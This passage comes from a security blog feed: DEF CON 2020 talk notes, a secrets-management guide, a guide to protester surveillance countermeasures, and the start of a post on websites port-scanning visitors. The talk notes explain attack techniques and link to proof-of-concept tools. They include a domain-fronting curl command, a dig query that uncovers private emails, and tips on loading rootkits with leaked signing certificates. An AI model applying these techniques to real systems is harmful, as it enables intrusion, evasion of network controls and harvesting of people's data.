such as with webhooks) which support TLS connections, and run services on local ports which accept unauthenticated TCP connections from localhost.</li><li>Services verified susceptible: memcached, hazelcast, SMTP, FTP, some DB&apos;s (maybe), syslog.</li><li>Demo of this technique using a phishing email + img tag on a page to get RCE on developer laptop running a local Django app with memcached. Nice!</li><li>Defensive take away: proxy outbound requests from your infra, and don&apos;t run unauthenticated TCP software</li></ul><h3 id="finding-exploiting-bugs-in-multiplayer-game-engines">Finding &amp; Exploiting bugs in Multiplayer Game Engines</h3><p><a href="https://www.youtube.com/watch?v=4weoWSzuCxs&amp;ref=nullsweep.com">Video</a></p><p>I sometimes build small games in my spare time for fun (most recently, a VR mermaid adventure for my daughter) so I find this topic interesting. I no longer have time to devote to most multiplayer style games, but I used to enjoy them. This talk by Jack Baker is mostly specific engine bugs that were discovered and fixed (except for Bug4).</p><p><a href="https://github.com/qwokka/defcon28?ref=nullsweep.com">Proof of concepts for each</a></p><ul><li>Looking at UNET (Unity networking library, deprecated, no alternatives, lots of indy games use it)</li><li>Multiplayer games generally use a distributed architecture with RPC&apos;s to communicate, with state replicated in both the client and server. Most games use UDP (websocket for browser games), so protocol has to deal with auth &amp; order issues.</li><li>Bug1: UE4 uses specialized &quot;URL&quot;s to communicate, which sometimes include file names, allowing LFI, including remote SMB (fixed in UE4.25.2)</li><li>Bug2: UNET / Unity, memory disclosure by sending a packet with a length field &gt; data sent - UNET will read in other memory, which works similar to Heartbleed (chat messages can leak memory data back to us via this method). Fixed in 1.0.6</li><li>Bug3: UE4 universal speed hack. UE4 checks tiemstamp sent for movement against last known valid timestamp seen from player. These values are floating points, which given certain operations can become NaN (Not a Number): NaN poisioning. Since operations are via RPC, we can include NaN as our argument for timestamp, the checking function computes the timestamp as valid. The NaN value propogates after a few requests until the server can no longer determine whether the client is modifying the time, allowing move speed changes. Interesting! </li><li>Bug4: UNET session hijacking. Packets aren&apos;t validated by source IP - only by values within the packet: hostID, SessionID, and packetID. HostID&apos;s are assigned sequentially. Session ID&apos;s randomly generated at connection (16 bit) - brute forcable. PacketID is also 16 bits, incremented with each packet. This can lead to discarding the packet, accepting it (correct guess), or disconnecting the session (too high) - kick other players. Not fixed, and unlikely to fix in the future - architectural issue. Can be limited with encryption, but not commonly used.</li></ul><h3 id="detecting-fake-4g-base-stations-in-real-time">Detecting Fake 4G Base Stations in Real Time</h3><p><a href="https://www.youtube.com/watch?v=siCk4pGGcqA&amp;ref=nullsweep.com">Video</a> </p><p>I recently wrote about <a href="https://nullsweep.com/government-surveillance-of-protestors/">government surveillance of protests</a>, including the use of sting rays (fake cell towers) to track protestors. </p><p>This talk by Cooper Quintin focuses on detecting devices that spoof a 4G tower.</p><ul><li>As I wrote previously, StingRay devices generally depend on older 2G network protocols to work. For 4G surveillance (HailStorm), EFF looked at changes in the standard: mutual authentication, better encryption, and in 4G the device no longer naively connects to strongest tower. (These are what make it difficult to spoof for surveillance)</li><li>Vulnerabilities in 4G leveraged: pre-auth handshake attacks and downgrade attacks - initial setup methods are implicitly trusted. Recommend <a href="https://www.eff.org/wp/gotta-catch-em-all-understanding-how-imsi-catchers-exploit-cell-networks?ref=nullsweep.com">Gotta Catch em All ISMI paper</a> by EFF for details.</li><li>The initial (before the auth handshake occurs) 4G connection requests include some sensitive information such as IMSI, sometimes GPS coords, and ability to attempt to downgrade the connection to 2G.</li><li>Data on how often these devices are used - ACLU published FOI request data showing hundreds or thousands of uses per year by both ICE/DHS and local law enforcement.</li><li>Evidence that foreign spies (deployed around DC / whitehouse), criminals (drug cartels), and cyber mercenaries (NSO group) leverage these technologies.</li><li>Current detection methods: apps (many false positives). Custom hardware based on radio (expensive, requires setup).</li><li>Real life testing looking for cell simulators at Standing Rock found no 2G, assumed that all uses must be 4G.</li><li>Releasing <a href="https://github.com/EFForg/crocodilehunter?ref=nullsweep.com">Crocodile Hunter</a> software stack - runs on a laptop or Pi with SDR &amp; LTE antennas.</li></ul><h3 id="starttls-is-dangerous">STARTTLS is Dangerous</h3><p>This is a live crypto village talk. <a href="https://youtu.be/fvpWEzOOaRA?t=1602&amp;ref=nullsweep.com">Video bookmark to stream</a>.</p><ul><li>STARTTLS most commonly used with email clients and servers - all Email protocols support it. Web uses implicit TLS generally.</li><li>If a client supports downgrading to plain text if STARTLS is not supported, then an active attacker can just claim that it isn&apos;t supported, and the client will connect anyway.</li><li>IMAP alerts can be sent at any time (including during the plain text pre TLS communication), and the client will show it as coming from the server.</li><li>Buffering bugs (CVE in 2011, but attacks not published at the time): If client sends multiple plain text packets prior to the handshake, most servers will process the plain text packets in the TLS session.</li><li>If attacker (MitM for SMTP) sends a plain text with injected Auth, Mail, and Data - server will then go through the auth with the client, and the client can be forced to send credentials to the attacker.</li><li>Similar attack with IMAP, but requires exact size ahead of time (so need to guess size of password), but attacker may be able to get multiple tries.</li><li>Bug discovered in 2011, but still prevalent in 1.5% of SMTP servers, 2.6% of POP3 servers, 2.4% IMAP.</li><li>We can trigger the same type of bug on the client by sending the client plain text appended to the STARTTLS and the client will think it is part of the TLS session (called Response Injection). Not very severe, but could be used to spoof mailbox content.</li><li>More than half of mail clients tested were vulnerable!</li><li>Other issues too - IMAP server can start session in PREAUTH, meaning no auth is required, and STARTTLS says it cannot be used in authenticated state - so clients may need to disconnect. If attacker also does a mailbox referral to an attacker controlled server, this could send credentials to attacker. Only 1 client (Alpine) was vulnerable to this, because most clients don&apos;t support referral.</li></ul><h3 id="android-bug-foraging">Android Bug Foraging</h3><p>This is a live session, <a href="https://www.youtube.com/watch?v=qbj-4NXsE-0&amp;ref=nullsweep.com">recording here</a>.</p><p>The talk covers several android standard application vulnerabilities, including some interesting ones!</p><ul><li>Process: List exported activities (reachable by other apps) and broadcast receivers, reverse the APK, and test the behavior and actions</li><li>Map out classes that handle specific intents / actions, and see if we can pass data into those that can modify the code execution path.</li><li>Google Camera vulns: Take photo without user action, even if smartphone is locked. Rogue app could invoke those capabilities without the normal camera permissions. POC app called spyxel that mutes volume, takes photos from camera, proximity sensor, GPS history, list/download SD files, auto record calls (fixed by Google).</li><li>Samsung find my mobile vulns: loads <code>/sdcard/fmm.prop</code> file, which a malicious app can create and pass it a malicious URL. There are also broadcast recievers not protected by any permission, which will load the specified file. Several vulns combined of this nature allow user monitoring, erase data, retrieve call/sms logs, etc. </li></ul><h3 id="a-lesson-in-privacy-engineering">A Lesson in Privacy Engineering</h3><p>This is a live talk</p><p>This talk covers privacy risks with the Norwegian Covid tracking applications that didn&apos;t do a great job protecting user privacy.</p><ul><li>Centralized solutions can lead to abuse - future nefarious use of the saved data, mining the data for other purposes than stated.</li><li>Privacy first contact tracing could have been used: Alices phone broadcast a message every few minutes (new) - bob receives the messages of every person he is near (including alice) -&gt; alice gets covid, then uploads the list of messages and time stamps -&gt; Bob can download the list and check his own contact history over it.</li><li>Problems with this implementation: data could be modified before uploading data to central server, required a phone number to use the app. </li><li>Expert group pulled in to publish open report on privacy (with full access to source) 5 days of analysis, preliminary report showed no deletion or anonymization implementations left, scalability issues, permanent device specific identifiers stored, lack of data validation.... plenty of issues found.</li></ul><h2 id="thursday-august-6th">Thursday August 6th</h2><h3 id="discovering-hidden-properties-to-attack-the-node-js-ecosystem">Discovering Hidden Properties to Attack the Node js Ecosystem</h3><p><a href="https://www.youtube.com/watch?v=oGeEoaplMWA&amp;ref=nullsweep.com">Video of talk</a></p><p>As a sometimes user of Node.js for a variety of things, I wasn&apos;t aware of this specific vulnerbility in JS. Feng Xiao clearly shows some interesting attacks.</p><ul><li>Attack vector: De-serialization from querystrings or objects. When a function expects a json object and assigns values improperly, attackers can inject key/value pairs to overwrite internal variables, including object protoypes (such as a constructor). Properties are generally considered trusted by developers.</li><li>Code may be vulnerable when using functions <em>like</em> Object.assign to assign all input values to an object or other merging functions.</li><li>This is similar to Mass Assignment risks in Ruby or Object injection in PHP.</li><li>Found 13 0Days, in a variety of libraries: SQL Injection, ID forging, input validation bypass, etc.). Five of the libraries have more than 1M monthly downloads, including MongoDB &amp; mongoose. </li><li>Nodejs vulnerabilities impact both node web apps, and desktop electron apps.</li><li>Some cool examples of web framework login bypass &amp; sqlinjection using this technique.</li><li><a href="https://github.com/xiafen9/Lynx?ref=nullsweep.com">Lynx</a> open source tool developed to identify and generate exploits for hidden properties.</li></ul><h3 id="dnssec-walks">DNSSEC walks</h3><p><a href="https://www.youtube.com/watch?v=q1cnsIM1w7c&amp;ref=nullsweep.com">video</a></p><p>This was a good talk by Hadrien Barral &amp; R&#xE9;mi G&#xE9;raud-Stewart. I always like to learn new ways to enumerate DNS entries. Emails are an interesting use case.</p><ul><li>Cloud providers often implement email redirection for clients by including a DNS TXT record, which can be queried to find the &apos;true&apos; private email of the user. Tools can check DNS records for common emails or emails harvested from sites: <code>dig TXT ${email} +noall +answer</code></li><li>DNSSEC offers cert chain of trust, which can be queried using <a href="https://dnsviz.net/d/defcon.org/dnssec/?ref=nullsweep.com">dnsviz</a>. Tool also shows DNS errors which can be interesting (including defcon.org!)</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/08/DEFCON.org-DNS-errors-1.png" class="kg-image" alt="DEFCON 2020 Live Notes" loading="lazy"><figcaption>DEFCON DNS errors</figcaption></figure><ul><li>Issue with DNSSEC: negative responses, since you can&apos;t authenticate for every non-existent subdomain. NSEC can be used to sign records where no domain exist, and this is done by signing intervals for which no domain exists. For example, there is no domain between <code>apple.example.com</code> and <code>carrot.example.com</code>, then we know that <code>bad.example.com</code> does not exist.</li><li>Using this knowledge, we can use it to enumerate hidden records for zones that use NSEC. Run a query for a random name such as <code>fgfrd.example.com</code>, response: nothing between carrot.example.com and good.example.com. Now we can repeat with gooda.example.com and loop to enumerate. However, NSEC is no longer used...</li><li>NSEC3 created to prevent this issue using hashed values. We can use the same technique to dump all the hashes of real records (giving a count of all records and commonly SHA1 hashes of all valid records).</li><li>hashcat was able to break them (on a single high end GPU) for 88% of 16,000 records. 75% resolved to interesting email redirection, 13% something else.</li><li>Stats: Most web owners used gmail, and about 50% of those users included name in the email. 66% of those did not show their email on the website, and 45% of those emails did not appear in a Google search - so some private emails harvested.</li><li>Fix: Configure NSEC3 with ECDSA signing</li></ul><h3 id="demystifying-modern-windows-rootkits">Demystifying Modern Windows Rootkits</h3><p><a href="https://www.youtube.com/watch?v=1H9tEfkjFXs&amp;feature=youtu.be&amp;ref=nullsweep.com">Video</a></p><p>I really liked this talk - <a href="https://billdemirkapi.me/?ref=nullsweep.com">Bill Demirkapi</a> explains rootkits and windows internals really well. I don&apos;t have much background with Windows internals or rootkits, so I learned a lot!</p><ul><li>Kernel drivers have significant privileges, given high trust by anti-virus, and are easier to hide than other forms of malware.</li><li>Loading a rootkit: abuse legitmate drivers - lot&apos;s of known &apos;vulnerable&apos; drivers (which require admin privileges): Capcom anti-cheat, intel NAL. Downside of method: poor compatibility across browser versions &amp; general instability of system as a result.</li><li>Loading a rootkit: buy a cert! OK for targeted attacks, but can reveal your identity or have the cert blacklisted.</li><li>Loading a rootkit: abuse a leaked certificate - most of the benefits of a legit one (and can often be found on game hacking forums), but newer certs can&apos;t be used on secureboot machines with Win10. (Kernel doesn&apos;t usually care if certs are revoked or expired). </li><li>Finding certs - a <a href="https://buckets.grayhatwarfare.com/?ref=nullsweep.com">greyhat warfare</a> s3 search for pfx or p12 extensions found 6k+ certs.</li><li>rootkit network communications: C2 server, direct port connection, hook into specific application communicaion channel.</li><li>Instead of directly hooking into a specific application, this technique instead hooks the entire host network (like wireshark) and monitors all packets for a malicious magic constant from the C2 server. C2 server can then send data on any valid port.</li><li>Hooking into the network user space events: create custom device and driver object to hook into File objects. A lot of really interesting windows internal specifics are discussed in the talk.</li><li><a href="https://github.com/d4stiny/spectre?ref=nullsweep.com">Spectre rootkit</a> created to demonstrate this method.</li></ul><h3 id="hacking-the-supply-chain">Hacking the Supply Chain</h3><p><a href="https://www.youtube.com/watch?v=wHsjf2mAHIM&amp;ref=nullsweep.com">Video</a></p><p>This video is specifically about maximizing vulnerability value by focusing research efforts on lesser known components that are generic and supplied to many end products. In this case, Treck TCP/IP stack, which is used in hundreds of millions of embedded devices.</p><ul><li>Due to nature of the end product (IoT, embedded device, medical device), vulnerabilities are unlikely to be patched. End users won&apos;t have good visiblity to vulnerability source (Treck), and some products with the vulnerability are no longer supported.</li><li>total 19 vulnerabilities found in Treck, including 4 RCE.</li><li>Based on DNS resolver, which can traverse NAT boundaries.</li><li>Treck DNS resolver has a function that calculates size, then allocates a buffer. However the size function misses a few critical checks - does not validate valid characters in domain names, does not enforce max character limit on domain name per RFC of 255 characters. It uses an unsigned short int while calculating a given record length (64k). I know where this is headed now :)</li><li>Max DNS packet size is 1460 bytes, but can use embedded compression to increase that beyond the integer max (72k).</li><li>This can be used for RCE on all DNS query types by including the specially crafted name in a CNAME record.</li><li>Device they tested (a UPS) has no ASLR or DEP, highly similar to x86 architecture.</li></ul><h3 id="long-live-domain-fronting-on-tls-1-3-">Long live Domain Fronting (on TLS 1.3)</h3><p><a href="https://www.youtube.com/watch?v=TDg092qe50g&amp;ref=nullsweep.com">video</a></p><p>Privacy is one of my core concerns, so I am always interested in ways to enhance it. This talk discusses how to use Domain Fronting with TLS 1.3 to bypass network controls and censorship, when the technique has been mostly halted with previous techniques.</p><p>The demo by Erik Hunstad is impressive, with interesting tools that demonstrate a setup that bypasses network filters and censorship.</p><ul><li>Domain fronting: Avoid network defenses or censorship by connecting to an innocuous domain while hiding the true destination (that may be banned or suspicious). Big restriction: fronted domain and fronting domain must be on the same service (CDN usually)</li><li>Domain fronting primer: request to HostA with Host header pointing to HostB: <code>curl -s -H &quot;Host: hidden.domain.com&quot; -H &quot;Connection: close&quot; &quot;https://fronteddomain.com/resource_on_hidden.domain.com&quot;</code></li><li>This worked great until 2018, when the Russian government put pressure on cloud environments to stop it to stop use of Telegram messenger app. AWS, Google and CloudFlare stopped it. Azure still allows it at the moment.</li><li>TLS 1.3 method: TLS 1.3 connection with ESNI sent to any cloudflare server. HTTP request is sent using that connection with any host header. SNI can be included as well, doesn&apos;t have to match ESNI. Cloudflare will forward to the true destination, as long as it has DNS Provided by CloudFlare.</li></ul><pre><code>TLS 1.3
GET /HTTP/1.1
Host: hackthis.computer
-----------------------------&gt; Any cloudflare IP ---&gt; hackthis.computer
ENSI: hackthis.computer
SNI: can-be-anything.com</code></pre><ul><li><a href="https://github.com/SixGenInc/Noctilucent?ref=nullsweep.com">Noctilucent</a> &#xA0;project Go crypto/tls rewrite which demonstrates domain hiding, with plenty of options.</li><li>Currently 21% of top 100k sites available for this on cloudflare.</li><li>Most traffic filtering is done on the SNI field, which this technique easily defeats.</li><li>What about HTTPS decrypting firewalls with root certs? Test firewall with TLS 1.3 decryption, setup with no exemptions. However, some exemptions are built in due to things like cert pinning on major sites - fronting with mozilla.org bypasses firewall, but does show up in logs.</li><li>What if it&apos;s setup with websockets? Creates only a single connection but also bypasses firewall controls (using <a href="https://github.com/cbeuw/Cloak?ref=nullsweep.com">Cloak</a> project to leverage websocket tunneling)</li><li>Blue team defenses: block or flag ClientHello packets that contain both <code>server_name</code> and <code>encrypted_server_name</code> or see if there are strange traffic patterns to specific sites. </li></ul>]]></content:encoded></item><item><title><![CDATA[Secrets Management for Developers]]></title><description><![CDATA[Best practices for managing secrets when building and deploying applications.]]></description><link>https://nullsweep.com/secrets-management-for-developers/</link><guid isPermaLink="false">5f0f2705fec4c205157621bd</guid><category><![CDATA[DevSecOps]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Wed, 15 Jul 2020 22:34:05 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/07/secret_management_best_practices.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/07/secret_management_best_practices.jpg" alt="Secrets Management for Developers"><p>One thing that comes up frequently in security is how to deal with application secrets. There are many methods for managing secrets, from hard coding into source code to using a credential manager to environment variables.</p><p>In this post, I&apos;ll go through some Do&apos;s and Don&apos;ts for managing secrets securely, both for web services and for client applications like mobile apps that need embedded API keys.</p><h2 id="the-best-practices-for-managing-secrets">The Best Practices for Managing Secrets</h2><p>If you just want to go straight to the most secure practices, here they are.</p><ul><li>Don&apos;t store any secrets on client applications or devices. If you need something like an auth token for a service, generate one token per user or device, and treat it as you would a user password.</li><li>Use a secret manager like <a href="https://www.vaultproject.io/?ref=nullsweep.com">Hashicorp Vault</a>, <a href="https://aws.amazon.com/secrets-manager/?ref=nullsweep.com">AWS Secrets Manager</a> or other platform specific credential management technology like <a href="https://kubernetes.io/docs/concepts/configuration/secret/?ref=nullsweep.com">kubernetes secrets</a>. Store all secrets here: API keys, service passwords, secret keys, etc.</li><li>Vault access should use a management system (IAM for AWS or the platform equivalent). If IAM solutions aren&apos;t available, use a CI/CD system to encrypt the vault credentials and inject them at deployment. The credentials themselves can be stored in the Vault and rotated by the vault admins.</li><li>Create separate sets of credentials for production at a minimum, ideally for each environment.</li></ul><p>This does requires running a separate piece of infrastructure (the vault), generally means more complex code has to be written to retrieve secrets, along with all the various failure modes that might be encountered, and ties your application more closely to the hosting solution. Not all organizations or teams are willing to do everything here.</p><h2 id="slightly-less-secure-but-still-pretty-good-secret-management-">Slightly Less Secure, but Still Pretty Good, Secret Management.</h2><p>For some systems, the overhead of maintaining a vault is too great. you can get most of the way there by managing credentials in a CI/CD pipeline and injecting them into the deployment environment. You can do this a few ways - by having a build step that injects encrypted credentials into a file (preferred), or directly setting environment variables on deploy (only if a file won&apos;t work for some reason, to avoid accidental disclosure of environment variables from things like phpinfo).</p><p>Alternately, if not using a CI/CD platform, have the production support team deploy environment variables or update credential files manually on production systems. Ensure that separate passwords are used in each environment.</p><h2 id="don-t-do-these-things">Don&apos;t Do These Things</h2><p>Here&apos;s a handy list of things to avoid doing where possible. </p><ul><li>Don&apos;t store credentials in your source code management system, like github, even if internal or private. It&apos;s hard to remove them from the history and too easy to leak.</li><li>Don&apos;t use the same set of credentials or API keys in production and other environments. Keep production credentials limited to a very small set of owners.</li><li>Don&apos;t give everyone read access to a credential store. Instead, use granular control, so users can only see credentials they reasonably need.</li><li>Don&apos;t put secrets in client applications. Every secret on a client can (and likely eventually will) be found and made public. This includes encryption keys, API keys, database credentials, and anything else that you wouldn&apos;t want users having access to. <br><br>Client applications include front end JavaScript on a web page, downloadable binaries, and mobile applications.</li><li>Don&apos;t share credentials between different production systems (have separate API keys, passwords, user accounts, etc. for every application)</li></ul><h2 id="conclusions">Conclusions</h2><p>Managing secrets is hard, which is why searching for &quot;credential leaks&quot; finds multiple recent news stories of data breaches, ransoms, and other problems from mismanaging credentials.</p><p>Though it can be involved to get to the best practices, every step in that direction helps!</p>]]></content:encoded></item><item><title><![CDATA[Government Surveillance of Protestors]]></title><description><![CDATA[Modern anti-protester tactics include many things: cell phone monitoring, communications disruptions, social media blocking, social media monitoring...]]></description><link>https://nullsweep.com/government-surveillance-of-protestors/</link><guid isPermaLink="false">5edd37dec049fc234ea58fa5</guid><category><![CDATA[Privacy]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 09 Jun 2020 22:13:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1573511860313-d333c8022170?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1573511860313-d333c8022170?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Government Surveillance of Protestors"><p>Governments around the world continue to ramp up surveillance of protests and civil unrest. Here, I have tried to collect the governmental use of technologies to monitor and disrupt movements in repressive and democratic countries alike.</p><p>Modern anti-protester tactics include many things: cell phone monitoring, communications disruptions, social media blocking, social media monitoring, and using cellular records to identify, arrest, and intimidate organizers.</p><p>With protests ongoing in the US and globally, I wanted to share tactics that I have been informed of or observed, as well as some counter tactics that protesters can adopt to attempt to limit government surveillance and interference.</p><p>Use your best judgement when considering tactics and counter measures. Be safe out there, and keep fighting for your rights and freedoms!</p><h2 id="stingray-cellphone-monitoring-disruption">Stingray Cellphone Monitoring &amp; Disruption</h2><p>A <a href="https://en.wikipedia.org/wiki/Stingray_phone_tracker?ref=nullsweep.com">stringray</a> is a device that mimics a cell tower, and can be used to disrupt cellular service, track phone locations, monitor communications (listen in to phone calls), and retrieve unique phone identifiers (IMEI) from devices.</p><p>Stingrays should be considered very dangerous to any protest movement as they can identify all cellphones in an area, along with nearly exact locations of each individual over time (by asking the device for a list of towers and strengths, a user can be fully triangulated).</p><p>These can be mounted on a flying drone or a police car, and have been in confirmed use in the US since 2006.</p><p><u><strong>Countermeasures</strong></u>: Unfortunately, stingrays are not easy to overcome without also disabling your phone. Here are a few things you can do, in rough order of simplicity and effectiveness:</p><ul><li>Put your phone on airplane mode. Unfortunately, this will render other safety precautions outlined below impossible, so consider carefully.</li><li>Configure your phone to use only the latest network types (4G+), since many stingrays depend on older standards, especially 2G, which may not be possible in all cases(<a href="https://oaklandmofo.com/blog/block-stringray-devices?ref=nullsweep.com">Disabling 2G in Android</a>). On iOS, you may find something in carrier settings, but I don&apos;t know of a way to fully disable forced 2G downgrade attacks.</li><li>Use burner phones (using a separate SIM is not enough, as the IMEI will not change, though you could attempt to rotate all identifiers).</li><li>Try downloading anti-stingray apps, but it <a href="https://www.wired.com/story/stingray-detector-apps/?ref=nullsweep.com">appears they are unlikely to work</a>.</li><li>Work with locals to setup mesh wifi networks, using apps like <a href="https://bridgefy.me/?ref=nullsweep.com">bridgefy</a> along with disabling wireless.</li></ul><h2 id="predator-surveillance-drone-ring-cameras">Predator Surveillance Drone &amp; Ring Cameras</h2><p>The Predator is used to surveil large geographic areas. From a <a href="https://www.extremetech.com/extreme/146909-darpa-shows-off-1-8-gigapixel-surveillance-drone-can-spot-a-terrorist-from-20000-feet?ref=nullsweep.com">2013 showcase</a>: A &quot;1.8-gigapixel video surveillance platform that can resolve details as small as six inches from an altitude of 20,000 feet (6km)&quot;. They use multiple cameras for various forms of imaging and a single drone can monitor an entire city.</p><p>A predator <a href="https://www.vox.com/recode/2020/5/29/21274828/drone-minneapolis-protests-predator-surveillance-police?ref=nullsweep.com">was spotted</a> flying over the Minneapolis protests.</p><p>In addition, many neighborhoods have <a href="https://www.theguardian.com/technology/2019/aug/29/ring-amazon-police-partnership-social-media-neighbor?ref=nullsweep.com">Ring camera</a>&apos;s installed, which allows police to view video feeds from doorsteps.</p><p>The main concern is mass use of video surveillance alongside facial recognition to identify large numbers of protestors. I don&apos;t have confirmation, but I think it&apos;s likely the drone resolution is still too low for facial recognition on the ground.</p><p><strong><u>Countermeasures</u></strong>: It&apos;s unlikely that either of these tools can provide clear enough photos for facial recognition in protest conditions. If possible, wear masks and clothing that help prevent facial recognition. Other forms of identification are also possible, and harder to prevent, such as <a href="http://jafari.tamu.edu/wp-content/uploads/2015/12/Anuradha_HealthNet08.pdf?ref=nullsweep.com">gait analysis</a>.</p><h2 id="disinformation-campaigns-psyops">Disinformation Campaigns &amp; PsyOps</h2><p>Not necessarily the local police, but disinformation to discourage gatherings, or to create violent conflict between groups based on false information. This may be as simple as users purposely posting incorrect meeting times and places to divide groups, or as complicated as generating false documents and events to create real news stories. </p><p>Interesting examples from the current protest include false claims that <a href="https://www.nbcnews.com/tech/social-media/klamath-falls-oregon-victory-declared-over-antifa-which-never-showed-n1226681?ref=nullsweep.com">Antifa is invading a town</a> (leading to the police notifying the military, leading to an official statement and hundreds of armed counter protestors) and <a href="https://www.theguardian.com/us-news/2020/jun/05/buffalo-police-officers-suspended-for-pushing-75-year-old-to-ground-during-protests?ref=nullsweep.com">police pushing down an old man, then falsely claiming he had tripped</a>.</p><p><strong><u>Countermeasures</u></strong>: It is generally easy to spot disinformation campaigns when other groups are targeted, but much harder to spot when disinformation aligns well with your world view and knowledge. Try not to fall for disinformation and document the truth to counter it in others.</p><ul><li>Always be vigilant and skeptical of information shared. Try to find source documents instead of third party write ups, edited video, or opinion pieces.</li><li>Document things on the ground. This can be as powerful as photos and video, or as simple as writing down notes with date/time stamps and descriptions.</li><li>Learn how to spot disinformation, and teach those around you.</li></ul><h2 id="social-media-spying">Social Media Spying</h2><p>Police have been known to monitor social media - <a href="https://www.washingtonpost.com/news/morning-mix/wp/2018/08/23/memphis-police-used-fake-facebook-account-to-monitor-black-lives-matter-trial-reveals/?ref=nullsweep.com">fake profiles / moles</a> and automated social media analysis are regularly used. In 2016, it was heavily reported that police were using automated tools to identify, track, and create dossiers on Ferguson protests. (<a href="https://medium.com/@ACLU_NorCal/police-use-of-social-media-surveillance-software-is-escalating-and-activists-are-in-the-digital-d29d8f89c48?ref=nullsweep.com#.fowkro6dy">ACLU research</a>, <a href="https://www.brennancenter.org/our-work/research-reports/map-social-media-monitoring-police-departments-cities-and-counties?ref=nullsweep.com">Brennan Center studies</a>). These were often marketed to police departments as a way to &quot;stay one step ahead of the rioters&quot;.</p><p>Geofeedia, the company most discussed in these articles, had some access revoked due to this reporting. However there are many companies that operate in this space, so consider this issue ongoing.</p><p><strong><u>Countermeasures</u></strong>: There is likely little to be done. The trade off between getting a particular message out, planning, and anonymity is a difficult one. If possible, consider the following:</p><ul><li>Create social media aliases for political activism unrelated to your real name. Companies like Facebook won&apos;t be fooled by this, but tools like geofeedia and moles will be. This works well for individuals who want to follow and attend events anonymously, less so for organizers or message amplifiers.</li><li>Leverage private, encrypted communications systems whenever possible. I recommend <a href="https://www.signal.org/?ref=nullsweep.com">signal</a>.</li></ul><h2 id="arrest-confiscate">Arrest &amp; Confiscate</h2><p>Police have been seen arresting and holding individuals overnight without allowing a phone call. Additionally, if arrested while filming, your device may be confiscated or destroyed, and it can take some time to have it returned.</p><p><strong><u>Countermeasures</u></strong>: Ensure that video you take is immediately saved off of your phone, and your device is setup to automatically notify others of your arrest.</p><ul><li>Use the <a href="https://www.aclu.org/issues/criminal-law-reform/reforming-police/aclu-apps-record-police-conduct?ref=nullsweep.com">ACLU mobile justice</a> app for your state to record police misconduct. This app claims to immediately upload the video. Facebook livestream and similar services are also a good choice.</li><li>Recent reports of protester arrests allege that they are sometimes held overnight without access to their phone or a call. Plan ahead and use apps like <a href="https://kitestring.io/?ref=nullsweep.com">KiteString</a> or <a href="https://support.apple.com/en-us/HT210514?ref=nullsweep.com">Find my Friends</a> to allow others to know if you are arrested.</li><li>This is a good article on <a href="https://www.theverge.com/21276979/phone-protest-demonstration-activism-digital-how-to-security-privacy?ref=nullsweep.com">securing your phone</a> before a protest.</li></ul><h2 id="conclusions">Conclusions</h2><p>Surveillance is difficult or impossible to avoid when planning or participating in a protest. The best way to ensure that surveillance is limited is to never build capabilities against citizens in the first place, and to enforce strict controls and punishments against agents and organizations who do so anyway.</p><p>Support organizations who fight this fight every day. In the US, this includes the <a href="https://www.eff.org/?ref=nullsweep.com">EFF</a>, <a href="https://www.aclu.org/?ref=nullsweep.com">ACLU</a> and <a href="https://www.freedomworks.org/?ref=nullsweep.com">FreedomWorks</a>.</p>]]></content:encoded></item><item><title><![CDATA[Why is This Website Port Scanning me?]]></title><description><![CDATA[Investigation of the practice of port scanning site visitors for fingerprinting and tracking.]]></description><link>https://nullsweep.com/why-is-this-website-port-scanning-me/</link><guid isPermaLink="false">5ec42ef0c049fc234ea58e64</guid><category><![CDATA[Privacy]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 19 May 2020 23:43:00 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/05/ebay_port_scan-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/05/ebay_port_scan-1.png" alt="Why is This Website Port Scanning me?"><p>Recently, I was tipped off about certain sites performing localhost port scans against visitors, presumably as part of a user fingerprinting and tracking or bot detection. This didn&apos;t sit well with me, so I went about investigating the practice, and it seems many sites are port scanning visitors for dubious reasons.</p><h2 id="a-brief-port-scanning-primer">A Brief Port Scanning Primer</h2><p>Port Scanning is an adversarial technique frequently used by penetration testers and hackers to scan internet facing machines and determine what applications or services are listening on the network, usually so that specific attacks can be carried out. It&apos;s common for security software to detect active port scans and flag it as potential abuse.</p><p>Most home routers don&apos;t have any open ports, so scanning an internet users IP address is unlikely to return any meaningful data. However, many users run software on their computer that listens on ports for various reasons - online gaming, media sharing, and remote connections are just a few things that consumers might install on a home PC.</p><p>A Port scan can give a website information about what software you are running. Many ports have a well defined set of services that use them, so a list 
of open ports gives a pretty good view of running applications. For instance, Steam (a gaming store and platform) is known to run on port 27036, so a scanner seeing that port open could have reasonable confidence that the user also had steam open while visiting the web site. </p><h2 id="watching-ebay-port-scan-my-computer">Watching Ebay Port Scan My Computer</h2><p>In the past I have worked on security products that specifically worried about port scanning from employee web browsers. Attack frameworks like <a href="https://beefproject.com/?ref=nullsweep.com">BeEF</a> include port scanning features, which can be used to compromise user machines or other network devices. So, I wanted to be able to alert on any port scanning on machines as a potential compromise, and a site scanning localhost might trip those alerts.</p><p>On the other hand, it&apos;s <a href="https://www.theregister.co.uk/2018/08/07/halifax_bank_ports_scans/?ref=nullsweep.com">been reported</a> on a few times in the past as banks sometimes port scan visitors, and I have heard Threat Matrix offers this as a customer malware detection check. </p><p>I was given the example of ebay as a site that includes port scanning, but when I initially navigated there I didn&apos;t see any suspicious behavior. I thought they might use some heuristics to determine who to scan, so tried a few different browsers and spoofed settings, without any luck.</p><p>I thought it might be because I run Linux, so I created a new Windows VM and sure enough, I saw the port scan occurring in the browser tools from the ebay home page:</p><figure 